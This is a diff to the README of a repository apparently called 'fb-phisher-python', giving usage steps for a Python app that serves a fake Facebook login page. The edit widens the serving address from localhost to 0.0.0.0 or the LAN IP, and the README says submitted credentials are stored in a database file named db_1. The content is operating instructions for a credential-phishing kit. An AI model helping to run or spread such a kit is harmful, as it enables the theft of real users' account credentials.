arjunindia/fb-phisher-python/README.md

 ## usage :
-clone the repository and open the terminal in source folder and run app.py root@kali~# python3 app.py now open your browser and go to localhost:5000 facebook login page will appear type your credentials and hit login you will see nothing will be happen but stick with me :)
+clone the repository and open the terminal in source folder and run app.py root@kali~# python3 app.py now open your browser and go to 0.0.0.0 or localhost or your lan ip. facebook login page will appear type your credentials and hit login you will see nothing will be happen but stick with me :)

 Go the source folder and then got database folder you will find one file name db_1 :